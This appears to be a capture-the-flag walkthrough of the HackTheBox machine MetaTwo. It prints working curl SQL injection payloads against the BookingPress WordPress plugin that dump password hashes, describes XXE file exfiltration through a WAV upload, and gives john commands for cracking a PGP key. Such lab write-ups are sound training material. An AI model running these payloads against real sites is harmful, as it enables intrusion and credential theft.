MetaTwo — HackTheBox
MetaTwo is an easy Linux machine from HackTheBox. It involves the exploitation of SQL injection CVE in the booking press (WordPress) plugin and XXE injection in the WordPress version to read credentials from the configurations file and initial foothold. Then, cracking the PGP private key used in the passpie password manager gives the credentials for the root user.
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp?
| fingerprint-strings:
| GenericLines:
|_ 220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
| 256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_ 256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/
|_http-server-header: nginx/1.18.0Port 21 (FTP)
Trying anonymous login on FTP fails.
Port 80 (HTTP)
So, let’s start with the web. Adding the domain in /etc/hosts, we open it in browser and get the following page.
The wappalyzer detects that it is wordpress site.
Running the wpscan, two users are identified.
wpscan --url http://metapress.htb/ -e ap,vt,u
Going to the events page that was shown at home page, we get following meeting scheduler. This is using a wordpress plugin but it was not identified by wpscan.
CVE-2022–0739 (Unauthenticated SQLi)
Viewing the page source, we can see the plugin name and version. It is bookingpress version 1.0.10.
Doing a simple google search, we get the following wpscan website which says that it this plugin is vulnerable to CVE-2022–0739 (Unauthenticated SQL Injection). It also has the PoC to exploit this vulnerability.
We just need to start with the second last step which is to find the nonce. It can be found in the page source.
Now, we just need to run the given curl command and change the nonce and url. In the response, we can see the result.
curl 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=f1c5d884ac&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -' | jq
Now, we can modify the sql query to see what tables are available in the current database. There’s wp_users table. We can dump it to get the passwords of users that we found earlier.
curl 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=f1c5d884ac&cat
egory_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_sch
ema.tables where table_schema=database()-- -' | jq
Modifying the query, we dump the username, password hash and email from wp_users table.
url 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=f1c5d884ac&cat
egory_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login,0x7c,user_pass,0x7c,user_email),NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL from wp_users-- -' | jq
Using hashcat, we successfully crack hash for manager user.
Now, we can login into the wordpress admin panel using the found username and password.
CVE-2021–29447 (XXE Injection)
There is nothing much we can do in panel because we have limited access. So, i started looking for vulnerabilities in this wordpress version and found that it is vulnerable to CVE-2021–29447 (XXE Injection). The following PoC demonstrates the steps to exploit this.
First create a malicious wav file with XXE payload.
Then create a DTD file and start a server in the same path as DTD file.
Next, login the wp admin panel and upload the wave file in media library. As soon as you upload the file, you get a hit on the started server.
Base64 decoding the query string, we get the content of /etc/passwd file.
Now, we can see that there’s a jnelson user. I tried to grab his ssh private key, but it did not work. So, we can try to look at wp-config file as it contains credentials. For this, first we need to know the path where wordpress i hosted. Since, we know the webserver is nginx, we can see the path at it’s configuration file.
Modify the DTD file.
And then again upload the wave file and base64 decode the query string.
Now that we know the path, let’s grab the wp config file. Repeating the same steps and base64 decoding the query string, we get the wp config file. It contains FTP credentials. Since, we saw it in the portscan and we could not login anonymously, so no let’s try with these credentials.
Logging in through FTP, we can see two directories. Blog directory is the wordpress directory. So, let’s look at the other one.
Here we can see the send email php script. Let’s download it and take a look at it.
In the php script, we get the SMTP credentials of jnelson user.
Trying these credentials on SSH, we can successfully login.
Privilege Escalation
Listing the hidden files in the jnelson home directory, we see a passpie hidden directory which contains some other files.
Googling about this, we get to know that it is a password manager and passwords are encrypted.
When trying to look at saved credentials, it asks for a passphrase.
Luckily for us, there’s a hidden keys file in this passpie directory which has both the private and public key. We can try to crack the private key our box.
Just copy the private key and convert it into a hash to crack using john.
gpg2john pgp.pem
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show
Now again lets try to get credentials from passpie password manager. This time we get the password.
Now just switch user to root and get the root flag.
References
- BookingPress < 1.0.11 — Unauthenticated SQL Injection: https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
- WordPress 5.6–5.7 — Authenticated XXE Within the Media Library Affecting PHP 8: https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5
